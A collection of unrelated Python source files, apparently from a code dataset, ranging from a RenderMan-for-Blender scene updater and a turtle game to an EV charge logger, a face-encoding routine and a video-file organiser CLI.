rman_sg_node = rsn
break
return rman_sg_node
def update_collection(self, coll):
# mark all objects in a collection
# as needing their instances updated
# the collection could have been updated with new objects
# FIXME: like grease pencil above we seem to crash when removing and adding instances
# of curves, we need to figure out what's going on
for o in coll.all_objects:
if o.type in ('ARMATURE', 'CURVE', 'CAMERA'):
continue
rman_type = object_utils._detect_primitive_(o)
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
if not rman_sg_node:
if not self.update_objects_dict(o, rman_type=rman_type):
self.new_objects.add(o)
self.update_instances.add(o)
continue
if rman_type == 'LIGHT':
# Check light visibility. Light visibility is already handled elsewhere
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.check_light_local_view(o, rman_sg_node):
continue
self.update_instances.add(o.original)
self.update_particles.add(o)
self.update_geometry_node_instances(o)
def update_geometry_node_instances(self, obj):
def update_geo_instances(nodes):
# look for all point instance nodes
for n in [node for node in nodes if isinstance(node, bpy.types.GeometryNodePointInstance)]:
if n.instance_type == 'OBJECT':
instance_obj = n.inputs['Object'].default_value
if instance_obj:
self.clear_instances(instance_obj)
self.update_particles.add(instance_obj)
self.update_instances.add(instance_obj.original)
elif n.instance_type == 'COLLECTION':
instance_coll = n.inputs['Collection'].default_value
if instance_coll:
self.update_collection(instance_coll)
if rman_constants.BLENDER_VERSION_MAJOR >= 2 and rman_constants.BLENDER_VERSION_MINOR >= 92:
if isinstance(obj, bpy.types.GeometryNodeTree):
rfb_log().debug("Geometry Node Tree updated: %s" % obj.name)
# look for all point instance nodes
update_geo_instances(obj.nodes)
elif hasattr(obj, 'modifiers'):
# This is an object with modifiers. Look for any geometry node trees attached.
node_tree = None
for modifier in obj.modifiers:
if modifier.type == 'NODES':
rfb_log().debug("Geometry Node Tree updated: %s" % modifier.node_group.name)
update_geo_instances(modifier.node_group.nodes)
def update_portals(self, ob):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator = self.rman_scene.rman_translators['LIGHT']
for portal in scene_utils.get_all_portals(ob):
rman_sg_node = self.rman_scene.rman_objects.get(portal.original, None)
if rman_sg_node:
translator.update(portal, rman_sg_node)
def update_scene(self, context, depsgraph):
## FIXME: this function is waaayyy too big and is doing too much stuff
self.new_objects.clear()
self.new_cameras.clear()
self.update_instances.clear()
self.update_particles.clear()
self.do_delete = False # whether or not we need to do an object deletion
self.do_add = False # whether or not we need to add an object
self.num_instances_changed = False # if the number of instances has changed since the last update
self.rman_scene.depsgraph = depsgraph
self.rman_scene.bl_scene = depsgraph.scene
self.rman_scene.context = context
particle_settings_node = None
did_mesh_update = False # did the mesh actually update
prev_num_instances = self.rman_scene.num_object_instances # the number of instances previously
# Check the number of instances. If we differ, an object may have been
# added or deleted
if self.rman_scene.num_object_instances != len(depsgraph.object_instances):
self.num_instances_changed = True
if self.rman_scene.num_object_instances > len(depsgraph.object_instances):
self.do_delete = True
else:
self.do_add = True
self.rman_scene.num_object_instances = len(depsgraph.object_instances)
rfb_log().debug("------Start update scene--------")
for obj in reversed(depsgraph.updates):
ob = obj.id
if isinstance(obj.id, bpy.types.Scene):
self._scene_updated()
elif isinstance(obj.id, bpy.types.World):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_integrator()
self.rman_scene.export_samplefilters()
self.rman_scene.export_displayfilters()
self.rman_scene.export_viewport_stats()
elif isinstance(obj.id, bpy.types.Camera):
rfb_log().debug("Camera updated: %s" % obj.id.name)
if self.rman_scene.is_viewport_render:
if self.rman_scene.bl_scene.camera.data != obj.id:
continue
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update_viewport_cam(self.rman_scene.bl_scene.camera, rman_sg_camera, force_update=True)
else:
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob, rman_sg_camera in self.rman_scene.rman_cameras.items():
if ob.original.name != obj.id.name:
continue
translator._update_render_cam(ob.original, rman_sg_camera)
elif isinstance(obj.id, bpy.types.Material):
rfb_log().debug("Material updated: %s" % obj.id.name)
self._material_updated(obj)
elif isinstance(obj.id, bpy.types.Mesh):
rfb_log().debug("Mesh updated: %s" % obj.id.name)
did_mesh_update = True
'''
# Experimental code path. We can use context.blend_data.user_map to ask
# what objects use this mesh. We can then loop thru and call object_update on these
# objects.
# We could also try doing the same thing when we add a new Material. i.e.:
# use user_map to figure out what objects are using this material; however, that would require
# two loops thru user_map
users = context.blend_data.user_map(subset={obj.id.original}, value_types={'OBJECT'})
translator = self.rman_scene.rman_translators['MESH']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for o in users[obj.id.original]:
rman_type = object_utils._detect_primitive_(o)
if rman_type != 'MESH':
continue
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
translator.update(o, rman_sg_node)
translator.export_object_primvars(o, rman_sg_node)
# material slots could have changed, so we need to double
# check that too
for k,v in rman_sg_node.instances.items():
self.rman_scene.attach_material(o, v)
return
'''
elif isinstance(obj.id, bpy.types.ParticleSettings):
rfb_log().debug("ParticleSettings updated: %s" % obj.id.name)
# Save this particle settings node, so we can check for it later
# when we process object changes
particle_settings_node = obj.id.original
elif isinstance(obj.id, bpy.types.ShaderNodeTree):
if obj.id.name in bpy.data.node_groups:
# this is probably one of our fake node groups with ramps
# update all of the users of this node tree
rfb_log().debug("ShaderNodeTree updated: %s" % obj.id.name)
users = context.blend_data.user_map(subset={obj.id.original})
for o in users[obj.id.original]:
if hasattr(o, 'rman_nodetree'):
o.rman_nodetree.update_tag()
elif hasattr(o, 'node_tree'):
o.node_tree.update_tag()
elif isinstance(obj.id, bpy.types.Object):
particle_systems = getattr(obj.id, 'particle_systems', list())
has_particle_systems = len(particle_systems) > 0
rman_type = object_utils._detect_primitive_(ob)
# grab the object from bpy.data, because the depsgraph doesn't seem
# to get the updated viewport hidden value
ob_data = bpy.data.objects.get(ob.name, ob)
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
# NOTE: hide_get() and hide_viewport are two different things in Blender
# hide_get() hides the object from the viewport, but it does not actually remove the object
# as instances of the object can still be visible (ex: in particle systems)
# hide_viewport should be interpreted as an actual deleted object, including
# particle instances.
is_hidden = ob_data.hide_get()
if not rman_sg_node:
rman_sg_node = self.update_objects_dict(obj.id, rman_type=rman_type)
if self.do_add and not rman_sg_node:
rman_type = object_utils._detect_primitive_(ob_data)
if ob_data.hide_get():
# don't add if this hidden in the viewport
continue
if ob.type == 'CAMERA':
self.new_cameras.add(obj.id.original)
else:
if rman_type == 'EMPTY' and ob.is_instancer:
self.update_empty(ob)
else:
if rman_type == 'LIGHT':
# double check if this light is an rman light
# for now, we don't support adding Blender lights in IPR
#
# we can also get to this point when adding new rman lights because
# blender will tell us a new light has been added before we've had to chance
# to modify its properties to be an rman light, so we don't want to
# add this light just yet.
if not shadergraph_utils.is_rman_light(ob):
self.rman_scene.num_object_instances = prev_num_instances
rfb_log().debug("------End update scene----------")
return
elif rman_type == 'EMPTY':
# same issue can also happen with empty
# we have not been able to tag our types before Blender
# tells us an empty has been added
self.rman_scene.num_object_instances = prev_num_instances
rfb_log().debug("------End update scene----------")
return
rfb_log().debug("New object added: %s" % obj.id.name)
self.new_objects.add(obj.id.original)
self.update_instances.add(obj.id.original)
if rman_type == 'LIGHTFILTER':
# Add Light filters immediately, so that lights
# can reference them ASAP.
self.add_objects()
self.new_objects.remove(obj.id.original)
self.num_instances_changed = False
continue
if rman_sg_node and rman_sg_node.sg_node:
# update db_name
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
rman_sg_node.db_name = db_name
if self.update_object_visibility(rman_sg_node, ob):
continue
else:
continue
if obj.is_updated_transform:
rfb_log().debug("Transform updated: %s" % obj.id.name)
if ob.type in ['CAMERA']:
# we deal with main camera transforms in view_draw
rman_sg_camera = self.rman_scene.rman_cameras[ob.original]
if rman_sg_camera == self.rman_scene.main_camera:
continue
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator._update_render_cam_transform(ob, rman_sg_camera)
continue
if rman_type == 'LIGHTFILTER':
self._light_filter_transform_updated(obj)
elif rman_type == 'GPENCIL':
# FIXME: we shouldn't handle this specifically, but we seem to be
# hitting a prman crash when removing and adding instances of
# grease pencil curves
self._gpencil_transform_updated(obj)
elif rman_type == 'EMPTY':
self.update_empty(ob, rman_sg_node)
elif self.num_instances_changed:
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
rman_sg_node.objects_instanced.clear()
else:
# This is a simple transform. We don't clear the instances.
# We always have to update particle systems when the object has transformed
# A transform changed can also be triggered when a particle system is removed.
self.update_particles.add(obj.id)
self.update_instances.add(obj.id.original)
self.update_geometry_node_instances(obj.id)
self.do_delete = False
if rman_type == 'LIGHT':
# check if portals are attached
self.update_portals(obj.id.original)
# Check if this object is the focus object the camera. If it is
# we need to update the camera
rman_sg_camera = self.rman_scene.main_camera
if rman_sg_camera.rman_focus_object and rman_sg_camera.rman_focus_object == rman_sg_node:
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
cam_object = translator.find_scene_camera()
translator.update(cam_object, rman_sg_camera)
if obj.is_updated_geometry:
if is_hidden:
# don't update if this is hidden
continue
rfb_log().debug("Object updated: %s" % obj.id.name)
if has_particle_systems and particle_settings_node:
self.do_delete = False
self.update_particle_settings(obj, particle_settings_node)
else:
# We always update particle systems in the non-num_instance_change case
# because the particle system can be pointing to a whole new particle settings
self.update_particles.add(obj.id)
if not self.num_instances_changed:
if rman_type == 'MESH' and not did_mesh_update:
# if a mesh didn't actually update don't call obj_geometry_updated
rfb_log().debug("Skip object updated: %s" % obj.id.name)
continue
self._obj_geometry_updated(obj)
elif isinstance(obj.id, bpy.types.Collection):
# don't check the collection if we know objects
# were added or deleted in the scene.
if self.do_delete or self.do_add:
continue
rfb_log().debug("Collection updated: %s" % obj.id.name)
self.update_collection(obj.id)
else:
self.update_geometry_node_instances(obj.id)
# call txmake all in case of new textures
texture_utils.get_txmanager().txmake_all(blocking=False)
# add new objs:
if self.new_objects:
self.add_objects()
elif self.do_add:
# if we didn't detect any new objects, but the number of
# instances changed, check our existing objects for object
# deletion and/or visibility
self.delete_objects()
# delete any objects, if necessary
if self.do_delete:
self.delete_objects()
# update any particle systems
self.update_particle_systems()
# re-emit any instances needed
self.reemit_instances()
rfb_log().debug("------End update scene----------")
def add_objects(self):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rfb_log().debug("Adding new objects:")
self.rman_scene.export_data_blocks(self.new_objects)
self.rman_scene.scene_any_lights = self.rman_scene._scene_has_lights()
if self.rman_scene.scene_any_lights:
self.rman_scene.default_light.SetHidden(1)
def delete_objects(self):
rfb_log().debug("Deleting objects")
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
keys = [k for k in self.rman_scene.rman_objects.keys()]
for obj in keys:
try:
ob = self.rman_scene.bl_scene.objects.get(obj.name_full, None)
# NOTE: objects that are hidden from the viewport are considered deleted
# objects as well
if ob and not ob.hide_viewport:
rman_sg_node = self.rman_scene.rman_objects.get(obj, None)
if rman_sg_node:
# Double check object visibility
self.update_object_visibility(rman_sg_node, ob)
continue
except Exception as e:
pass
rman_sg_node = self.rman_scene.rman_objects.get(obj, None)
if rman_sg_node:
for k,v in rman_sg_node.instances.items():
if v.sg_node:
self.rman_scene.sg_scene.DeleteDagNode(v.sg_node)
rman_sg_node.instances.clear()
# For now, don't delete the geometry itself
# there may be a collection instance still referencing the geo
# self.rman_scene.sg_scene.DeleteDagNode(rman_sg_node.sg_node)
del self.rman_scene.rman_objects[obj]
# We just deleted a light filter. We need to tell all lights
# associated with this light filter to update
if isinstance(rman_sg_node, RmanSgLightFilter):
for light_ob in rman_sg_node.lights_list:
light_key = object_utils.get_db_name(light_ob, rman_type='LIGHT')
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
try:
self.rman_scene.processed_obs.remove(obj)
except ValueError:
rfb_log().debug("Obj not in self.rman_scene.processed_obs: %s")
pass
if self.rman_scene.render_default_light:
self.rman_scene.scene_any_lights = self.rman_scene._scene_has_lights()
if not self.rman_scene.scene_any_lights:
self.rman_scene.default_light.SetHidden(0)
def update_cropwindow(self, cropwindow=None):
if not self.rman_render.rman_interactive_running:
return
if cropwindow:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
options = self.rman_scene.sg_scene.GetOptions()
options.SetFloatArray(self.rman_scene.rman.Tokens.Rix.k_Ri_CropWindow, cropwindow, 4)
self.rman_scene.sg_scene.SetOptions(options)
def update_integrator(self, context):
if not self.rman_render.rman_interactive_running:
return
if context:
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_integrator()
self.rman_scene.export_viewport_stats()
def update_viewport_integrator(self, context, integrator):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
integrator_sg = self.rman_scene.rman.SGManager.RixSGShader("Integrator", integrator, "integrator")
self.rman_scene.sg_scene.SetIntegrator(integrator_sg)
self.rman_scene.export_viewport_stats(integrator=integrator)
def update_viewport_res_mult(self, context):
if not self.rman_render.rman_interactive_running:
return
if not self.rman_scene.is_viewport_render:
return
if context:
self.rman_scene.context = context
self.rman_scene.bl_scene = context.scene
self.rman_scene.viewport_render_res_mult = float(context.scene.renderman.viewport_render_res_mult)
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update_viewport_resolution(rman_sg_camera)
translator.update_transform(None, rman_sg_camera)
self.rman_scene.export_viewport_stats()
def update_global_options(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_global_options()
self.rman_scene.export_hider()
self.rman_scene.export_viewport_stats()
def update_root_node_func(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_root_sg_node()
def update_material(self, mat):
if not self.rman_render.rman_interactive_running:
return
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
if not rman_sg_material:
return
translator = self.rman_scene.rman_translators["MATERIAL"]
has_meshlight = rman_sg_material.has_meshlight
rfb_log().debug("Manual material update called for: %s." % mat.name)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update(mat, rman_sg_material)
if has_meshlight != rman_sg_material.has_meshlight:
# we're dealing with a mesh light
rfb_log().debug("Manually calling mesh_light_update")
self.rman_scene.depsgraph = bpy.context.evaluated_depsgraph_get()
self._mesh_light_update(mat)
def update_light(self, ob):
if not self.rman_render.rman_interactive_running:
return
rman_sg_light = self.rman_scene.rman_objects.get(ob.original, None)
if not rman_sg_light:
return
translator = self.rman_scene.rman_translators["LIGHT"]
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.update(ob, rman_sg_light)
def update_light_filter(self, ob):
if not self.rman_render.rman_interactive_running:
return
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if not rman_sg_node:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.rman_translators['LIGHTFILTER'].update(ob, rman_sg_node)
for light_ob in rman_sg_node.lights_list:
light_key = object_utils.get_db_name(light_ob, rman_type='LIGHT')
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
def update_solo_light(self, context):
if not self.rman_render.rman_interactive_running:
return
# solo light has changed
self.rman_scene.bl_scene = context.scene
self.rman_scene.scene_solo_light = self.rman_scene.bl_scene.renderman.solo_light
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for light_ob in scene_utils.get_all_lights(self.rman_scene.bl_scene, include_light_filters=False):
rman_sg_node = self.rman_scene.rman_objects.get(light_ob.original, None)
if not rman_sg_node:
continue
rm = light_ob.renderman
if not rm:
continue
if rm.solo:
rman_sg_node.sg_node.SetHidden(0)
else:
rman_sg_node.sg_node.SetHidden(1)
def update_un_solo_light(self, context):
if not self.rman_render.rman_interactive_running:
return
# solo light has changed
self.rman_scene.bl_scene = context.scene
self.rman_scene.scene_solo_light = self.rman_scene.bl_scene.renderman.solo_light
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for light_ob in scene_utils.get_all_lights(self.rman_scene.bl_scene, include_light_filters=False):
rman_sg_node = self.rman_scene.rman_objects.get(light_ob.original, None)
if not rman_sg_node:
continue
rm = light_ob.renderman
if not rm:
continue
if self.rman_scene.check_light_local_view(light_ob, rman_sg_node):
continue
rman_sg_node.sg_node.SetHidden(light_ob.hide_get())
def update_viewport_chan(self, context, chan_name):
if not self.rman_render.rman_interactive_running:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_samplefilters(sel_chan_name=chan_name)
def update_displays(self, context):
if not self.rman_render.rman_interactive_running:
return
self.rman_scene.bl_scene = context.scene
self.rman_scene._find_renderman_layer()
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.export_displays()
def texture_updated(self, nodeID):
if not self.rman_render.rman_interactive_running:
return
if nodeID == '':
return
tokens = nodeID.split('|')
if len(tokens) < 3:
return
node_name,param,ob_name = tokens
node, ob = scene_utils.find_node_by_name(node_name, ob_name)
if ob == None:
return
ob_type = type(ob)
if isinstance(ob, bpy.types.Material):
ob.node_tree.update_tag()
elif isinstance(ob, bpy.types.NodeTree):
ob.update_tag()
elif ob_type == bpy.types.World:
ob.update_tag()
else:
# light, lightfilters, and cameras
ob.update_tag(refresh={'DATA'})
def flush_texture_cache(self, texture_list):
if not self.rman_render.rman_interactive_running:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for tex in texture_list:
self.rman_scene.sg_scene.InvalidateTexture(tex)
def update_enhance(self, context, x, y, zoom):
if not self.rman_render.rman_interactive_running:
return
rman_sg_camera = self.rman_scene.main_camera
if rman_sg_camera.projection_shader.name.CStr() != 'PxrCamera':
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
res_x = int(self.rman_scene.viewport_render_res_mult * x)
res_y = int(self.rman_scene.viewport_render_res_mult * y)
projparams = rman_sg_camera.projection_shader.params
projparams.SetVector("enhance", [res_x, res_y, zoom])
rman_sg_camera.sg_camera_node.SetProjection(rman_sg_camera.projection_shader)
|
python
|
import time
from turtle import Screen
from player import Player
from car_manager import CarManager
from scoreboard import Scoreboard
screen = Screen()
screen.setup(width=600, height=600)
screen.tracer(0)
#TODO1: Create the turtle and move it with keypress
player = Player()
screen.listen()
screen.onkey(player.go_up, "Up")
#TODO2: Create and move cars
cars = CarManager()
#TODO5: Create a scoreboard
scoreboard = Scoreboard()
game_is_on = True
while game_is_on:
time.sleep(0.1)
screen.update()
cars.create_car()
cars.move_car()
#TODO3: Detect turtle collission with cars
for car in cars.all_cars:
if car.distance(player) < 20:
game_is_on = False
scoreboard.game_over()
#TODO4: Detect when turtle crosses the finish line
if player.is_at_finish():
player.goto_start()
cars.level_up()
scoreboard.level_up()
screen.exitonclick()
|
python
|
s = list(input('Escriba el string: '))
s[0] = s[0].upper()
print(''.join(s))
|
python
|
# -*- coding: utf-8 -*-
"""Charge logging script
This script will download the get_vehicle_status every 5 minutes
and log them locally. Based on the Charge Off-Peak script.
This script is independent from visualization script in order to run it on different computers
"""
import jlrpy
import threading
import datetime
import math
from datetime import date
import os
import configparser
# login info (email and password) are read from $HOME/.jlrpy.cfg
# which contains a single line with email and password separated by ':'
# [email protected]:PassW0rd
# passwords containing a ':' are not allowed
logger = jlrpy.logger
def check_soc():
"""Retrieve vehicle status.
"""
"""!missing: adjust logging frequency to charging speed:
> 100% every 1 Min
> 50% every 2 Min
> 0 every 5 Min
unpluged every 5 Min
"""
threading.Timer(2 * 60, check_soc).start() # Called every 2 minutes
# getting status update
status = { d['key'] : d['value'] for d in v.get_status()['vehicleStatus'] }
current_soc = int(status['EV_STATE_OF_CHARGE'])
charging_status = status['EV_CHARGING_STATUS']
logger.info("current SoC is "+str(current_soc)+"%")
if status['EV_CHARGING_METHOD'] == "WIRED":
logger.info("car is plugged in")
logger.info("charging status is "+charging_status)
p = v.get_position()
position = (p['position']['latitude'], p['position']['longitude'])
logger.info("car geo-position is "+str(position))
position = ", 'POSITION_LATITUDE': " + str(position[0]) + ", 'POSITION_LONGITUDE': " + str(position[1])
t = datetime.datetime.now()
clogfilename = "jaguar-logs/charging-log_" + t.strftime("%Y-%m-%d_%H-%M-%S") + ".json"
clogfile= open(clogfilename,"w+")
logger.info("writing charging log file " + clogfilename)
# getting health status forces a status update
healthstatus = v.get_health_status()
status = { d['key'] : d['value'] for d in v.get_status()['vehicleStatus']}
logtime = ", 'LOGTIMESTAMP': '"+ t.isoformat() +"'}"
clogfile.write(str(status).replace("}", "") + position + logtime)
clogfile.close()
else:
logger.info("car is not plugged in")
config = configparser.ConfigParser()
configfile = os.environ['HOME']+"/.jlrpy.ini"
config.read(configfile)
username = config['jlrpy']['email']
password = config['jlrpy']['password']
home = (float(config['jlrpy']['home_latitude']), float(config['jlrpy']['home_longitude']))
c = jlrpy.Connection(username, password)
v = c.vehicles[0]
logger.info("[*] Logging vehicle status")
check_soc()
|
python
|
from time import sleep
from jumpscale import j
from .VirtualboxClient import VirtualboxClient
JSBASE = j.application.jsbase_get_class()
class VirtualboxFactory(JSBASE):
def __init__(self):
self.__jslocation__ = "j.clients.virtualbox"
JSBASE.__init__(self)
self.logger_enable()
self._client = None
@property
def client(self):
if self._client is None:
self._client = VirtualboxClient()
return self._client
|
python
|
from PIL import ImageFont
class Letter:
""" letter class- each letter is one of these objects, and is rendered in order. """
def __init__(self,char,size,font,color = (255,255,255,255),b=False,i=False,u=False):
"""
char: character.
size: size of letter.
font: PIL truetype font object. TODO: add handling for other types
color: color of letter, RGBA tuple, range 0-1.
b: Bold flag.
i: Italics flag.
u: Underlined flag.
"""
self.char = char
self.size = size
self.font = ImageFont.truetype(font, size)
self.color = color
self.b = b
self.i = i
self.u = u
def get_kerning(self):
""" gets dimensions as tuple(w,h) that it will be when rendered. """
return self.font.getsize(self.char)
|
python
|
#TODO: Add datadump
|
python
|
# -*- coding: utf-8 -*-
from . import helpers
import os
import shutil
import json
import logging
import sys
import face_recognition
from ringFace.ringUtils import commons
def processUnencoded(imageDir):
"""
Processes any unencoded image in the new-images subdir of a person, and moves it into encoded-images folder.
The encoded face is stored in the same named files in the encodings subdir of the person.
It uses the pretrained convolutional neural network to extract the 128 dimensional encodings.
This model http://dlib.net/python/index.html#dlib.cnn_face_detection_model_v1 is available via the face_recognition wrapping the dlib.
"""
for personName in os.listdir(imageDir):
newImagesdir=imageDir + "/" + personName + "/new-images"
encodedImagesDir=imageDir + "/" + personName + "/encoded-images"
encodedingsDir=imageDir + "/" + personName + "/encodings"
ignoredImagesDir=imageDir + "/" + personName + "/ignored-images"
if os.path.exists(newImagesdir):
logging.info(f"encoding new faces of {personName} from dir {newImagesdir}")
for newPersonImage in os.listdir(newImagesdir):
logging.debug(f"processing {newPersonImage}")
try:
personImageFile = newImagesdir + "/" + newPersonImage
encoding = encodeImage(personImageFile)
commons.persistEncoding(encoding, encodedingsDir, newPersonImage)
commons.moveFileTo(personImageFile, encodedImagesDir, "File processed")
except helpers.MultiFaceError as err:
logging.debug(f"MultiFaceError on {newPersonImage}")
commons.moveFileTo(err.filename, ignoredImagesDir, "MultiFaceError")
except:
logging.error("Unexpected error:", sys.exc_info()[0])
else:
logging.warn(f"ignoring person {personName}")
def encodeImage(personImageFile):
"""
Takes an image file path as input, and returns the 128 long numpy array of encoding
"""
logging.debug(f"encodeImage {personImageFile}")
face = face_recognition.load_image_file(personImageFile)
face_bounding_boxes = face_recognition.face_locations(face)
#If training image contains exactly one face
if len(face_bounding_boxes) == 1:
face_encoding = face_recognition.face_encodings(face)[0]
return face_encoding
else:
logging.debug(f"{personImageFile} was skipped and can't be used for training")
raise helpers.MultiFaceError(personImageFile)
|
python
|
from os import path
import click
from glob import glob
from pathlib import Path
from app.newAnimeEpisodes import *
@click.command()
@click.option('--source', required=True, type=str, help='Enter absolute path of directory to move from')
@click.option('--destination', required=True, type=str, help='Enter absolute path of directory to move to')
@click.option('--parse', default=False, is_flag=True, required=True, help='Will parse the filenames for files in a given directory via regex. The parser will remove any brackets and characters within the brackets, replace underscores with spaces, and remove any dash charcters (-) and charcters following the dash. This will not rename the file.')
@click.option('--age', default=False, is_flag=True, required=False, help='Checks file age and compares it to a specified accepted time interval set by `acceptedFileAge`')
@click.option('--move', default=False, is_flag=True, required=True, help='Moves the file in a directory to another directory that is specified.')
def organize(source, destination, parse, age, move):
'''
Organizes media files in one directory to another directory.
Reisen will look for a matching directory with a parsed name of the filenames in the base directory.
Reisen will then either move the file if there is a match, or create a directory and then move the file.
'''
types = ('.avi', '.mkv', '.mp4')
initialDir = os.listdir(source)
initialDirGlob = glob(str(source) + '/**/', recursive=True)
if parse and age and move:
setMinutes = age
if not initialDir:
click.echo(colorText(f'ERROR: ')[2] + 'Empty directory. Please double check that you specified the right path. \n')
else:
for dir in initialDirGlob:
filePath = os.listdir(dir)
for originalFileName in filePath:
if os.path.isdir(source + '/' + originalFileName)==False and not originalFileName.endswith( types ):
click.echo(colorText(f'\nERROR: ')[2] + f'Found file that does not end in file types: ')
click.echo(colorText(f'{types}')[1] + '\n')
click.echo(f'Skipping file: ' + colorText(f'{originalFileName}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif originalFileName.endswith( types ):
newFileName = parsedFilename(str(originalFileName)).parse()
fileInfo = checkAge(originalFileName, setMinutes, dir).check()
runFileActions = moveFile(str(newFileName), str(originalFileName), dir, destination, fileInfo)
runFileActions.moveToDir()
elif os.path.isdir(source + '/' + originalFileName)==True and len(os.listdir(source + '/' + originalFileName)) == 0:
click.echo(colorText(f'\nWARNING: ')[2] + f'Found objects that are not video files or empty directories in: ')
click.echo(colorText(f'\n{source}\n')[0])
click.echo(f'Files or folders in question: ' + colorText(source + '/' + originalFileName)[1] + '\n ')
click.echo("Please double check your specified base directory and remove any files and/or empty directories that are not video files that match: ")
click.echo(colorText(f'{types}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif parse and move and not age:
if not initialDir:
click.echo(colorText(f'ERROR: ')[2] + 'Empty directory. Please double check that you specified the right path. \n')
else:
for dir in initialDirGlob:
filePath = os.listdir(dir)
for originalFileName in filePath:
fileInfo = None
if os.path.isdir(source + '/' + originalFileName)==False and not originalFileName.endswith( types ):
click.echo(colorText(f'\nERROR: ')[2] + f'Found file that does not end in file types: ')
click.echo(colorText(f'{types}')[1] + '\n')
click.echo(f'Skipping file: ' + colorText(f'{originalFileName}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif originalFileName.endswith( types ):
newFileName = parsedFilename(str(originalFileName)).parse()
runFileActions = moveFile(str(newFileName), str(originalFileName), dir, destination, fileInfo)
runFileActions.moveToDir()
elif os.path.isdir(source + '/' + originalFileName)==True and len(os.listdir(source + '/' + originalFileName)) == 0:
click.echo(colorText(f'\nWARNING: ')[2] + f'Found objects that are not video files or empty directories in: ')
click.echo(colorText(f'\n{source}\n')[0])
click.echo("Please double check your specified base directory and remove any files and/or empty directories that are not video files that match: ")
click.echo(colorText(f'{types}')[1] + '\n')
click.echo('―' * 100) # U+2015, Horizontal Bar
elif parse and not move and not age:
click.echo(f'{colorText("ERROR")[2]}: Missing option flag {colorText("--move")[2]}.\n ')
elif move and not parse and not age:
click.echo(f'{colorText("ERROR")[2]}: Missing option flag {colorText("--parse")[2]}.\n ')
elif source or destination==None:
click.echo(f'{colorText("ERROR")[2]}: Missing parameters in options for {colorText("--source")[2]} and {colorText("--destination")[2]}. \n\nMake sure if you specify something with "--" you also pass a value. Check {colorText("--help")[1]} or {colorText("-h")[1]} for help.\n')
else:
click.echo('WAAAAAAAAAAAAAAAAACK')
|
python
|
""" A test action set. """
# Enthought library imports.
from envisage.ui.action.api import Action, Group, Menu, ToolBar
from envisage.ui.workbench.api import WorkbenchActionSet
class TestActionSet(WorkbenchActionSet):
""" An action test useful for testing. """
#### 'ActionSet' interface ################################################
# The action set's globally unique identifier.
id = 'envisage.ui.workbench.test'
menus = [
Menu(
name='&Test', path='MenuBar', before='Help',
groups=['XGroup', 'YGroup']
),
Menu(
name='Foo', path='MenuBar/Test',
groups=['XGroup', 'YGroup']
),
Menu(
name='Bar', path='MenuBar/Test',
groups=['XGroup', 'YGroup']
),
]
groups = [
Group(id='Fred', path='MenuBar/Test')
]
tool_bars = [
ToolBar(name='Fred', groups=['AToolBarGroup']),
ToolBar(name='Wilma'),
ToolBar(name='Barney')
]
actions = [
Action(
